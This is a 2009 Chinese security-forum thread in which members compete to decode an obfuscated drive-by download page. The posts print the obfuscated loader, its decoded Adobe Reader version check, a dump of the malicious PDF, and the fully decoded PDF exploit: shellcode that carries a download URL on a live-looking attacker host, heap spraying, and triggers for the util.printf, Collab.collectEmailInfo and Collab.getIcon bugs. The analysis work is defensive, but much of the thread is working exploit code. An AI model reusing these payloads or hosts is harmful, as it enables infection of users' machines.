瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网马解密悬赏第三十七期(附pdf文件在9楼)结束
networkedition - 2009-11-17 9:54:00


引用:
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:论坛所有会员均可参加


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
networkedition - 2009-11-17 9:54:00



// <script>
tpZ=23;if(yFc=unescape)tpZ='';fUJxi=yFc('%'+tpZ);
BjX5='doj63umenx74.wrix74e(q22R3cj64iv sq74ylex3dj5cq22positionq3aabsoluteq3bR20leq66tj3ax2dj31000q70q78q3b tx6fpq3ax2d1j3000R70j78q3bR5cj22x3eq22)j3bvx61r R46YR71j3dnullq3btryx7bFj59j71j3dnewx20Activq65Xj4fbq6aecq74(R22q41j63roPDFq2ePx44FR22)q3bx7dj63q61tcj68(e)R7bR7dif(q21Fq59q71)x7bj74rj79x7bFYj71x3dneR77j20ActiveXx4fj62q6aect(x22Pj44F.PdfCtR72lq22)j3bj7dcatq63x68(e)q7bR7dR7diR66(FYj71q29j7blvj3dj28j28FYR71.Getx56eq72sionsj28).sx70R6cix74(q22,j22)j29q5bj34R5d.splR69x74(j22j3dq22))q5b1j5dx2erepx6cj61ce(R2fq5cx2ex2fg,R22j22)R3bif((lq76R3cq390j30)x26q26(lvx21j3dx381j33)R29docj75ment.writx65(q27R3ceR6dbx65d srcj3dq22hq74tpx3ax2fx2fghoj73tx2dmail.deq2f0000009c2ej31j335bfx30q31R2fR732R64pq61yyp.phpx3fsj3dd1TNx66x4dfj26x69j64x3d2q22 widthq3dR31R30x30R20R68eigj68tj3d100 tx79peR3dR22q61pq70licaq74ionx2fpdfx22R3eq3cq2fembedj3eR27)x3bx7dq64q6fcx75j6dentR2ej77j72ite(x22R3cx2fdx69vj3ex22)x3b';
zPiEu=yFc(BjX5.replace(/[xjqR]/g,fUJxi));eval(zPiEu);
//</script>


ty88 - 2009-11-17 12:57:00
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");var FYq=null;try{FYq=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!FYq){try{FYq=new ActiveXObject("PDF.PdfCtrl");}catch(e){}}if(FYq){lv=((FYq.GetVersions().split(","))[4].split("="))[1].replace(/\./g,"");if((lv<900)&&(lv!=813))document.write('<embed src="http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2" width=100 height=100 type="application/pdf"></embed>');}document.write("</div>");
ty88 - 2009-11-17 12:58:00
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2

T馆成功,耶:kaka12:
是昔流芳 - 2009-11-17 13:13:00
关于:hxxp://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php解密的日志(全体输出 -  2):

Level  0>http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php
Level  1>http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2

analyzed by 是昔流芳

一个eval而已
是昔流芳 - 2009-11-17 13:19:00
顺便问一句,孔子用什么工具获取的代码?
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2
这个获取的是残缺不全的代码
networkedition - 2009-11-17 13:27:00
直接使用下载工具下载,是个dat文件,实际是个pdf文件。ms代码也不全。
ty88 - 2009-11-17 13:27:00
是个PDF
如果。。。呵呵需要自己读取代码否则得到的只能是没用的函数
networkedition - 2009-11-17 13:28:00
附下载的dat文件修改扩展名为pdf

附件: j0cTk.rar
ty88 - 2009-11-17 13:28:00
我发上来吧

附件: gzS0.rar
ty88 - 2009-11-17 13:35:00
http://wepawet.iseclab.org/view.php?hash=539728d82ab367858975c7ae94e6b1f0&type=js
PDF在线分析报告。。。
反正我啥也没解出来,也不会解密这个,不管了上课去
是昔流芳 - 2009-11-17 19:04:00
代码这个样子的:kaka6:

PDF Comment '%PDF-1.4\n'

obj 1 0
Type: /Catalog
Referencing: 2 0 R, 8 0 R
[(1, '\n'), (2, '<<'), (2, '/Pages'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/PageLayout'), (1, ' '), (2, '/SinglePage'), (1, '\n'), (2, '/Names'), (1, ' '), (2, '<<'), (1, ' '), (2, '/JavaScript'), (1, ' '), (3, '8'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Catalog'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Pages 2 0 R

  /PageLayout /SinglePage

  /Names /JavaScript 8 0 R
>>

[(1, '\n'), (2, '<<'), (2, '/Pages'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/PageLayout'), (1, ' '), (2, '/SinglePage'), (1, '\n'), (2, '/Names'), (1, ' '), (2, '<<'), (1, ' '), (2, '/JavaScript'), (1, ' '), (3, '8'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Catalog'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 2 0
Type: /Pages
Referencing: 3 0 R
[(1, '\n'), (2, '<<'), (2, '/Kids'), (1, ' '), (2, '['), (3, '3'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, ']'), (1, '\n'), (2, '/Count'), (1, ' '), (3, '1'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Pages'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Kids [3 0 R]

  /Count 1

  /Type /Pages

>>

[(1, '\n'), (2, '<<'), (2, '/Kids'), (1, ' '), (2, '['), (3, '3'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, ']'), (1, '\n'), (2, '/Count'), (1, ' '), (3, '1'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Pages'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 3 0
Type: /Page
Referencing: 2 0 R, 4 0 R
[(1, '\n'), (2, '<<'), (2, '/Parent'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Contents'), (1, ' '), (3, '4'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Page'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Parent 2 0 R

  /Contents 4 0 R

  /Type /Page

>>

[(1, '\n'), (2, '<<'), (2, '/Parent'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Contents'), (1, ' '), (3, '4'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Page'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 4 0
Type:
Referencing:
Contains stream
[(1, '\n'), (2, '<<'), (2, '/Length'), (1, ' '), (3, '31'), (1, ' '), (2, '>>'), (1, '\n')]

<<
  /Length 31
>>

[(1, '\n'), (2, '<<'), (2, '/Length'), (1, ' '), (3, '31'), (1, ' '), (2, '>>'), (1, '\n'), (3, 'stream'), (1, '\n'), (3, '0'), (1, ' '), (3, '0'), (1, ' '), (3, '595.28000'), (1, ' '), (3, '841.89000'), (1, ' '), (3, 're'), (1, ' '), (3, 'W'), (1, ' '), (3, 'n'), (1, '\n\n'), (3, 'endstream'), (1, '\n')]

obj 5 0
Type:
Referencing:
Contains stream
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4592'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

<<
  /Length 4592
  /Filter /FlateDecode

>>

'B41P7aY73D30C3dX75Y6eQ65S73E63P61S70D65G28Q22D25S75Y34S33V34E33P25S75H34G33R34A33B25P75K34J33Q34A33I25U75D30F46S45U42Y25W75J33R33A35Q42H25E75J36G36X43E39K25M75X38S30T42O39T25V75E38D30E30V31E25N75P45H46S33I33B25R75E45L32J34F33B25R75K45K42X46H41P25I75U45M38A30N35B25T75I46G46X45N43B25B75A46Q46I46T46Y25K75L38D42V37U46J25X75L44U46I34I45C25Y75Q45W46L45R46K25N75L36T34T45I46G25U75J45H33L41S46A25K75D39M46N36Y34G25X75W34S32R46E33B25T75D39R46Q36O34J25B75B36U45U45U37C25B75P45M46J30A33F25K75K45I46W45Y42H25C75V36D34V45N46I25W75H42L39O30Y33A25X75Z36B31R38U37W25U75W45L31H41F31M25M75P30W37U30L33V25C75O45R46G31J31E25O75G45M46A45U46K25B75S41K41C36J36E25Z75E42A39K45L42F25W75X37V37T38S37G25P75V36V35G31B31E25L75Q30L37X45R31F25I75S45X46S31V46H25X75U45L46Y45F46X25E75C41V41Z36W36O25G75L42J39B45R37K25G75C43B41R38A37S25W75I31L30U35B46G25B75Z30B37N32X44G25K75C45J46F30B44F25T75H45Q46C45J46H25N75P41K41P36G36K25I75D42T39T45X33U25A75Y30U30B38M37R25I75W30U46R32B31V25W75V30D37N38Y46M25V75M45B46F33B42I25Q75J45L46J45D46I25E75D41H41Y36F36T25Q75O42Q39K46F46S25G75C32N45J38P37M25W75K30Y41Y39Q36A25G75G30J37S35P37M25B75U45Q46I32S39W25C75J45K46S45U46Q25L75A41S41Z36K36I25L75H41T46J46F42J25J75M44Q37T36F46F25G75G39A41X32P43T25T75R36C36D31K35W25T75W46X37M41V41I25V75G45P38O30Q36V25Y75A45I46P45U45N25U75A42T31V45X46I25O75R39A41Q36U36L25N75O36H34L43B42D25T75W45K42I41L41A25D75K45B45L38Z35V25Y75U36V34S42P36T25B75E46K37C42U41F25N75I30U37V42T39W25Z75M45T46J36U34F25J75Y45P46K45K46P25G75J38K37C42B46Z25V75C46D35G44F39Y25M75T39H46H43O30A25D75N37M38X30X37H25C75G45G46R45R46Q25H75X36Z36R45A46A25R75W46D33V41C41J25U75P32C41B36X34R25B75B32F46O36Y43C25V75A36I36B42S46A25R75A43Y46R41R41Y25S75J31U30V38E37X25E75Y45N46H45Z46L25Y75B42M46D45P46L25F75K41L41O36M34E25O75E38E35N46W42W25M75O42F36H45J44K25E75O42I41S36V34I25D75U30J37Q46X37Y25B75C45J46N38Q45W25R75F45A46W45S46W25S75F41L41Y45M43U25I75R32J38R43J46F25Z75N42Z33I45D46W25G75F43Z31Q39S31P25M75J32V38N38G41O25K75Z45T42V41X46F25Q75G38W41A39X37G25F75W45U46F45E46Y25C75L39D41C31B30V25R75N36E34N43B46L25B75L45K33U41G41I25A75W45O45W38W35L25D75C36H34X42I36M25V75K46X37Y42M41Z25T75E41M46Y30S37N25K75T45Z46U45N46F25C75O38C35Q45K46Y25B75O42B37J45L38J25V75H41U41T45G43H25S75A44M43F43Y42E25T75I42X43S33D34L25X75F31Z30Z42W43K25Y75Y43Y46Z39H41K25J75D42S43D42W46Y25K75P41Y41W36U34X25A75N38G35Y46G33J25J75D42P36J45D41L25T75C42K41S36C34R25C75L30V37U46P37R25T75Z45H46R43W43B25O75X45P46U45V46V25E75E45Z46T38O35D25F75H39F41Q31Z30I25H75C36T34D43X46I25V75Q45I37C41H41F25D75W45C44S38R35X25N75W36C34M42Q36Q25Q75V46Y37V42M41X25D75T46A46X30X37X25G75S45N46P45U46V25U75Y38S35X45R46K25U75F36G34X31S30W25O75I46S46N41D41E25L75H45Y45L38F35V25J75L36O34W42A36I25S75V46H37L42S41Y25V75N45D46B30L37V25Y75A45D46Q45N46H25U75Y41P45T45K46U25O75T42F44C42Q34G25L75J30C45T45U43U25S75P30H45V45R43T25R75P30T45V45G43G25D75B30F45S45U43P25M75I30J33S36L43Z25Z75X42I35B45Q42D25V75I36T34D42E43L25W75W30A44Q33S35H25X75V42I44C31N38C25S75A30L46C31S30X25B75R36V34K42S41M25N75O36V34H30R33Z25S75O45W37T39E32O25A75B42J32J36E34X25L75X42X39X45Z33Q25U75A39I43Q36L34A25C75Z36P34X44G33G25X75Y46V31T39S42A25I75S45B43S39B37G25P75N42D39N31L43C25E75G39D39M36W34P25N75Y45O43C43V46V25J75S44U43F31M43M25F75U41F36H32M36H25N75C34V32R41Q45G25U75U32M43X45H43I25N75U44H43B42X39D25X75G45W30R31L39I25D75R46D46J35Y31Q25Q75L31T44L44C35J25S75X45E37E39U42M25N75I32G31V32J45E25Y75G45L43U45Y32X25D75B41O46G31L44M25X75B31Y45Q30N34B25A75F31Y31F44K34T25R75Y39B41Y42T31L25C75R42S35O30M41Q25L75P30S34A36W34D25M75T42F35L36K34T25M75K45Y43L43Q42J25E75H38H39F33G32B25R75J45S33J36X34E25Z75J36U34R41J34Q25V75W46K33A42H35U25U75U33F32T45F43V25C75J45D42K36P34J25L75H45T43D36Q34R25I75Q42A31C32I41J25T75D32F44D42E32N25X75Y45H46D45R37M25Y75U31W42C30E37M25M75Q31T30F31U31K25W75C42A41W31F30I25G75Y41M33M42C44Q25Z75A41P30H41D32H25T75B45B46Q41E31G25D75Q37W34X36V38Q25H75S37T30I37P34Z25Q75V32X46D33I41A25U75I36A37J32P46D25R75J36F46S36A38J25Z75D37Z34W37A33V25M75I36O44G32Q44D25F75H36Z39D36K31H25D75E32Q45D36O43F25H75F36O35M36Y34O25W75X33S30V32T46S25R75G33B30F33M30R25J75R33Y30I33V30J25Q75Y33N39G33C30B25M75J33G32B36W33F25P75S33C31I36N35W25B75F33C35C33L33P25T75U36H36S36D32C25C75U33B31P33B30D25R75N37N33Y32O46J25D75E36B34F33M32P25C75N36V31F37Q30G25U75J37B39C37C39E25F75E32Y45G37U30A25K75L36N38X37K30C25H75N33H46I37T30U25Y75V36H34T36A39X25Z75V33H31A33X44K25E75D32P36D33J30K25D75T30W30R30R30G22U29Y3bT20B76H61M72W20F46I34D4eY49J6cB3dX6eE65J77X20C41U72C72F61J79G28P29U3bK20J66Q75C6eA63W74X69Y6fQ6eZ20G6cD51V52L28L53Y4eJ65V2cA78G37Z55K58E53C29E7bH20I77O68O69X6cI65Y28G53Z4eB65G2eW6cY65F6eM67X74L68Q2aS32W3cC78R37G55X58R53M29X53C4eR65Z2bG3dY53H4eU65M3bE20D53L4eL65C3dM53S4eY65K2eX73L75I62J73B74A72G69D6eR67M28A30J2cZ78Y37L55Q58X53S2fP32F29N3bC72K65Q74O75V72T6eA20N53S4eL65L3bE7dT20V66G75U6eB63J74M69O6fK6eW20N44I6dH52E28G29A7bT20L76N61W72V20E68K75R6fY3dL30E78Q30W63Q30V63Q30L63B30L63M3bL76X61A72V20T43O47E58B78S3dL30B78M34W30O30I30S30T30T3bJ76R61E72O20I63B57E7aD53R3dQ41E7aD73C30P2eA6cD65L6eU67S74Q68V2aL32B3bW20X76X61L72G20Q78F37A55Z58W53E3dO43E47F58T78H2dX28J63M57A7aM53B2bB30Q78N33V38I29D3bQ76T61E72N20R53B4eZ65Y3dS75E6eY65S73A63C61G70F65I28Z22N25G75J39Z30H39V30B25I75L39O30D39U30R22U29O3bV20I53F4eX65H3dD6cP51M52C28H53N4eF65O2cS78N37N55F58U53W29F3bB76S61G72J20D58U7aN61Y32L79H3dM28H68P75S6fE2dX30V78U34J30Y30B30W30D30P29O2fQ43D47U58K78A3bA20M66S6fG72V20W28A76I61V72M20Q47H36T5aG3dZ30Y3bD47V36S5aN3cT58U7aJ61W32K79Y3bN47N36T5aY2bO2bT29K46H34Z4eG49E6cA5bP47Z36N5aG5dG3dH53M4eG65F2bQ41B7aY73D30V3bS7dM20S74C72L79F7bQ76E61E72F20X4eP7aM4eX3dV61Q70X70K2eP76L69R65W77S65D72C56X65T72E73W69W6fZ6eO2eJ74R6fR53U74X72I69Y6eC67N28W29R3bZ20T4eN7aQ4eR3dY4eF7aC4eP2eC63V68S61E72T41M74I28P30J29I2aE31S30A30V2bN4eY7aD4eL2eA63R68I61R72Q41B74F28H32T29D2aM31W30S2bO4eR7aK4eT2eK63X68C61Z72G41K74D28Y34K29Z3bL20I69C66X28J28T4eG7aB4eK3eH3dG38R30B30J29E26X26B28T4eO7aM4eM3cY3dJ38O31Y32P29Z29C7bO20K76B61A72T20E72Y65C30Y6dE32D3dI75M6eK65A73N63T61F70K65U28Y22Z25H75L30Y41Q30A41W25F75Z30Z41U30J41A22U29D3bF76S61F72D20W76J32M68J38T4cM3dW32M30S3bH76H61Q72G20O71B55E66F74C3dB76K32B68A38E4cL2bB41Z7aO73G30R2eU6cK65O6eD67W74X68X3bJ20U77K68B69B6cR65S28I72G65T30M6dL32W2eO6cW65X6eP67B74J68Q3cA71Y55X66S74S29H72H65W30D6dF32U2bN3dZ72E65O30B6dW32G3bJ76C61A72W20O70W77K73K3dU72A65M30E6dQ32N2eC73O75G62V73V74N72S69Z6eS67M28M30S2cQ71B55T66M74I29C3bP20J76Z61D72G20J53O76B35K5aB3dF72A65O30H6dP32V2eD73K75I62V73K74B72H69X6eT67Y28Y30N2cL72H65P30A6dR32O2eE6cX65Y6eT67Y74J68V2dE71K55K66M74Z29F3bP20K77O68L69U6cP65S28R53J76R35Q5aW2eC6cY65M6eD67P74B68I2bN71A55C66M74J3cY30Q78T36I30C30S30N30S29C53B76D35X5aR3dW53O76A35N5aF2bW53Q76D35J5aU2bT70K77D73G3bK20G66S6fT72E28I59N4bM45L4bG54Z3dD30I3bB59G4bG45S4bC54V3cT31Q32A30Q30G3bE59Z4bB45X4bJ54E2bD2bU29K7bW46O34O4eE49B6cB5bQ59I4bA45T4bQ54C5dA3dX53V76C35S5aP2bT41S7aF73Z30X7dF20B76U61P72F20Y4fJ49Q49U39Y3dF22Z31A32G39P39I39H39J39Z39J39J39W39F39M39O39U39F39H39A39F39E39F22G3bZ66U6fM72X28E48D52S66C59I6bR3dC30O3bH48L52V66Q59K6bF3cA32G37L36M3bV48G52S66D59G6bX2bI2bL29E4fH49G49R39F2bK3dU22X38M22C3bP20P75R74W69A6cN2eN70L72S69N6eS74E66A28N22K25T34R35Q30Q30Z30C66V22G2cI4fM49M49S39G29J3bF7dJ20Z69U66A28W28V4eN7aJ4eG3cG37X31Y30K29Y7cM7cV28R28D4eL7aI4eC3eO38E30J30W29Q26V26P28X4eF7aU4eG3cF38P31G32B29L29U29L7bR44A6dJ52Q28K29I3bC20F76A61G72R20J6eJ35F59N59T3dC75E6eP65R73B63U61M70I65A28B22P25B75M30J63N30E63J25X75U30U63F30X63A22F29E3bS77P68O69Y6cC65H28A6eH35W59S59J2eQ6cE65R6eR67G74G68S3cT34Q34G39Y35Z32D29T6eU35I59R59U2bO3dV6eM35D59J59L3bG20Q74L68N69N73E2eX63E6fJ6cO6cV61Q62V53O74J6fL72U65I3dL43X6fB6cF6cG61S62A2eV63O6fN6cY6cY65Y63F74P45K6dT61C69O6cQ49G6eX66F6fB28O7bB73P75Y62N6aJ3aG22Y22H2cH6dE73N67A3aE6eI35O59R59H7dN29Q3bM7dC20A69G66E28O28W4eK7aM4eC3cL3dB39D30A30Z29Q26K26F28O4eR7aN4eT21E3dO37Y31N31D29Q26V26Q28G4eI7aS4eG21O3dW38V31L33G29I26N26R61J70Q70S2eI64G6fC63O2eV43T6fB6cP6cY61Q62N2eM67T65D74H49J63J6fP6eB29P7bE44X6dL52P28E29T3bC20W76D61S72O20L44Z59R70A71V63K3dC75K6eJ65S73X63V61L70A65D28U22J25T30W39Z22X29U3bL77M68Y69F6cP65U28I44I59J70U71H63A2eU6cC65L6eW67M74U68O3cK30Q78A34K30U30U30U29N7bQ44U59K70K71F63X2bJ3dK44N59E70S71V63N3bN7dD20O44H59F70Z71E63S3dU22S4eD2eL22S2bN44F59N70I71S63E3bC61D70P70I2eB64Y6fS63O2eD43L6fK6cR6cZ61N62F2eG67T65F74K49M63A6fD6eP28L44W59D70R71J63L29J3bN7dO20N7dD63W61P74B63P68E28E65B29O7bW7d'

obj 6 0
Type:
Referencing:
Contains stream
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '130'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

<<
  /Length 130
  /Filter /FlateDecode

>>

"JpI=24;if(app.alert)JpI++;hfGc=this;Zyu=unescape;WDNJR=hfGc.info;JpI=Zyu('%'+JpI);tqSPO=WDNJR.Trailer.replace(/[A-Z]/g,JpI);eval(Zyu(tqSPO))"

obj 7 0
Type:
Referencing: 6 0 R
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/S'), (1, ' '), (2, '/JavaScript'), (1, ' '), (2, '/JS'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n')]

<<
  /S /JavaScript
  /JS 6 0 R
>>

[(1, '\n'), (2, '<<'), (1, ' '), (2, '/S'), (1, ' '), (2, '/JavaScript'), (1, ' '), (2, '/JS'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n')]

obj 8 0
Type:
Referencing: 7 0 R
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Names'), (1, ' '), (2, '['), (2, '('), (3, 'uoO'), (2, ')'), (1, ' '), (3, '7'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, ']'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Names [(uoO) 7 0 R ]

>>

[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Names'), (1, ' '), (2, '['), (2, '('), (3, 'uoO'), (2, ')'), (1, ' '), (3, '7'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, ']'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 9 0
Type:
Referencing: 5 0 R
[(1, '\n'), (2, '<<'), (2, '/Creator'), (1, ' '), (2, '('), (3, 'Adobe'), (2, ')'), (1, '\n'), (2, '/Title'), (1, ' '), (2, '('), (3, 'qya'), (2, ')'), (1, '\n'), (2, '/Trailer'), (1, ' '), (3, '5'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Producer'), (1, ' '), (2, '('), (3, 'Notepad'), (2, ')'), (1, '\n'), (2, '/Author'), (1, ' '), (2, '('), (3, 'Miekiemoes'), (2, ')'), (1, '\n'), (2, '/CreationDate'), (1, ' '), (2, '('), (3, 'D:20080924194756'), (2, ')'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Creator (Adobe)

  /Title (qya)

  /Trailer 5 0 R

  /Producer (Notepad)

  /Author (Miekiemoes)

  /CreationDate (D:20080924194756)

>>

[(1, '\n'), (2, '<<'), (2, '/Creator'), (1, ' '), (2, '('), (3, 'Adobe'), (2, ')'), (1, '\n'), (2, '/Title'), (1, ' '), (2, '('), (3, 'qya'), (2, ')'), (1, '\n'), (2, '/Trailer'), (1, ' '), (3, '5'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Producer'), (1, ' '), (2, '('), (3, 'Notepad'), (2, ')'), (1, '\n'), (2, '/Author'), (1, ' '), (2, '('), (3, 'Miekiemoes'), (2, ')'), (1, '\n'), (2, '/CreationDate'), (1, ' '), (2, '('), (3, 'D:20080924194756'), (2, ')'), (1, '\n'), (2, '>>'), (1, '\n')]

xref [(3, 'xref'), (3, '0'), (3, '9'), (3, '0000000000'), (3, '65535'), (3, 'f'), (3, '0000000009'), (3, '00000'), (3, 'n'), (3, '0000000112'), (3, '00000'), (3, 'n'), (3, '0000000168'), (3, '00000'), (3, 'n'), (3, '0000000230'), (3, '00000'), (3, 'n'), (3, '0000000310'), (3, '00000'), (3, 'n'), (3, '0000004976'), (3, '00000'), (3, 'n'), (3, '0000005179'), (3, '00000'), (3, 'n'), (3, '0000005225'), (3, '00000'), (3, 'n'), (3, '0000005268'), (3, '00000'), (3, 'n')]

trailer
<<
  /Info 90R
  /Root 10R
  /Size 9
>>

startxref 5407

PDF Comment '%%EOF\n'


smallyou93 - 2009-11-17 19:41:00
完全不懂...
錢尛天 - 2009-11-17 21:06:00
这期也 看到了  继续 GO
BlastXiang - 2009-11-17 23:27:00
pdf那个把所有大写的字符干掉
(大概对应pdf的tqSPO=WDNJR.Trailer.replace(/[A-Z]/g,JpI);一句)

然后16进制-字符就可以了:kaka6:

随便用一个脚本或程序都可以完成,比如用vb,
Private Sub Form_Load()
On Error Resume Next
Dim a() As Byte
  a = Text1.Text
Dim b As Long, c As String
  For b = 0 To UBound(a)
    If Chr$(a(b)) = LCase$(Chr$(a(b))) Then c = c + Chr$(a(b))
  Next b
  Debug.Print c
End Sub


http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?id=10&

解出来的结果是:

Azs0=unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F68%u7473%u6D2D%u6961%u2E6C%u6564%u302F%u3030%u3030%u3930%u3263%u3165%u3533%u6662%u3130%u732F%u6432%u6170%u7979%u2E70%u6870%u3F70%u6469%u313D%u2630%u0000"); var F4NIl=new Array(); function lQR(SNe,x7UXS){ while(SNe.length*2<x7UXS)SNe+=SNe; SNe=SNe.substring(0,x7UXS/2);return SNe;} function DmR(){ var huo=0x0c0c0c0c;var CGXx=0x400000;var cWzS=Azs0.length*2; var x7UXS=CGXx-(cWzS+0x38);var SNe=unescape("%u9090%u9090"); SNe=lQR(SNe,x7UXS);var Xza2y=(huo-0x400000)/CGXx; for (var G6Z=0;G6Z<Xza2y;G6Z++)F4NIl[G6Z]=SNe+Azs0;} try{var NzN=app.viewerVersion.toString(); NzN=NzN.charAt(0)*100+NzN.charAt(2)*10+NzN.charAt(4); if((NzN>=800)&&(NzN<=812)){ var re0m2=unescape("%u0A0A%u0A0A");var v2h8L=20;var qUft=v2h8L+Azs0.length; while(re0m2.length<qUft)re0m2+=re0m2;var pws=re0m2.substring(0,qUft); var Sv5Z=re0m2.substring(0,re0m2.length-qUft); while(Sv5Z.length+qUft<0x60000)Sv5Z=Sv5Z+Sv5Z+pws; for(YKEKT=0;YKEKT<1200;YKEKT++){F4NIl[YKEKT]=Sv5Z+Azs0} var OII9="12999999999999999999";for(HRfYk=0;HRfYk<276;HRfYk++)OII9+="8"; util.printf("%45000f",OII9);} if((NzN<710)||((NzN>800)&&(NzN<812))){DmR(); var n5YY=unescape("%u0c0c%u0c0c");while(n5YY.length<44952)n5YY+=n5YY; this.collabStore=Collab.collectEmailInfo({subj:"",msg:n5YY});} if((NzN<=900)&&(NzN!=711)&&(NzN!=813)&&app.doc.Collab.getIcon){DmR(); var DYpqc=unescap("%09");while(DYpqc.length<0x4000){DYpqc+=DYpqc;} DYpqc="N."+DYpqc;app.doc.Collab.getIcon(DYpqc);} }catch(e){}


1
查看完整版本: 网马解密悬赏第三十七期(附pdf文件在9楼)结束